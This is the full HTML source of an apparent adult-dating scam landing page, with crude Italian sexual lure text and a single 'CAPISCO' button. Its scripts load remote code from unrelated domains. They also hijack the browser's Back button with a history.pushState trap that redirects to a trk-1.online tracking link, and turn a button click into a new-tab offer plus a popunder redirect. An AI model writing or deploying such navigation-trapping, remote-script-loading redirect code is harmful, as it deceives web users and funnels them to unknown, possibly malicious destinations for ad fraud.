<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta confirm="partners-house-179211" />
    <title>18+</title>
    <style>
      /* Resetting default margin and padding */
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
      }

      /* Centering everything horizontally and vertically */
      html,
      body {
        height: 100%;
        display: flex;
        justify-content: center;
        align-items: center;
        font-family: Arial, sans-serif;
        background-color: #f0f0f0;
      }

      /* Container for the content */
      .container {
        text-align: center;
        max-width: 90%;
      }

      /* Styling for the sections */
      .section {
        margin-bottom: 30px;
      }

      /* Styling for the button */
      .button {
        display: inline-block;
        padding: 10px 20px;
        background-color: #00ff33;
        color: #fff;
        text-decoration: none;
        border-radius: 5px;
        transition: background-color 0.3s ease;
      }

      .button:hover {
        background-color: #00ff33;
        color: red;
      }
    </style>
    <script type="text/javascript">
      const time_wait = 0;
      const blackout = 0;
      const yaban = 0;
      const title = "";
      const desc = "";
    </script>
    <script
      type="text/javascript"
      src="https://news-zacine.com/code/https-v2.js?uid=179211&site=1222192963&banadu=0&sub1=sub1&sub2=sub2&sub3=sub3&sub4=sub4"
      async
    ></script>
    <script
      type="text/javascript"
      src="https://news-secuhu.com/process.js?id=1222192963&p1=sub1&p2=sub2&p3=sub3&p4=sub4"
      async
    ></script>
    <script>
      window.onload = function () {
        if (window.history && window.history.pushState) {
          history.pushState(null, null, document.URL);
          window.addEventListener("popstate", function () {
            history.pushState(null, null, document.URL);
            // Здесь добавьте код для перенаправления пользователя на нужную вам ссылку
            window.location.href =
              "http://trk-1.online/go/06a977a1-2b64-4e77-b0bd-67d66016dca7?cpc={cpc}&ref_id={click_id}&campaign_id={campaign_id}&sub_id={sub_id}&creative_id={creative_id}&source_id={source_id}";
          });
        }
      };
    </script>
    <script>
      document.addEventListener("DOMContentLoaded", function () {
        document
          .querySelector(".button")
          .addEventListener("click", function (e) {
            // prevent default button click
            e.preventDefault();

            // "main offer" (new tab takes focus)
            window.open("https://trk-1.online/click", "_blank", "noreferrer");

            // "popunder" (current tab)
            window.location.replace(
              "http://trk-1.online/go/7ff5e2ab-e3d8-4244-9035-657eba47b228?cpc={cpc}&ref_id={click_id}&campaign_id={campaign_id}&sub_id={sub_id}&creative_id={creative_id}&source_id={source_id}"
            );
          });
      });
    </script>
  </head>
  <body>
    <div class="container">
      <!-- First Section -->
      <section class="section">
        <h1 style="color: red; font-size: 2em">IMPORTANTE!</h1>
      </section>

      <!-- Second Section -->
      <section class="section">
        <img src="18598925.gif" alt="" width="300" />
      </section>

      <!-- Third Section -->
      <section class="section">
        <h2>Dovete solo scegliere una donna e chiederle di scoparvi.</h2>
      </section>

      <!-- Fourth Section -->
      <section class="section">
        <h2>Per favore, mantenete segreta la vostra identità!</h2>
      </section>

      <!-- Fifth Section -->
      <section class="section">
        <a class="button">CAPISCO</a>
      </section>
    </div>
  </body>
</html>
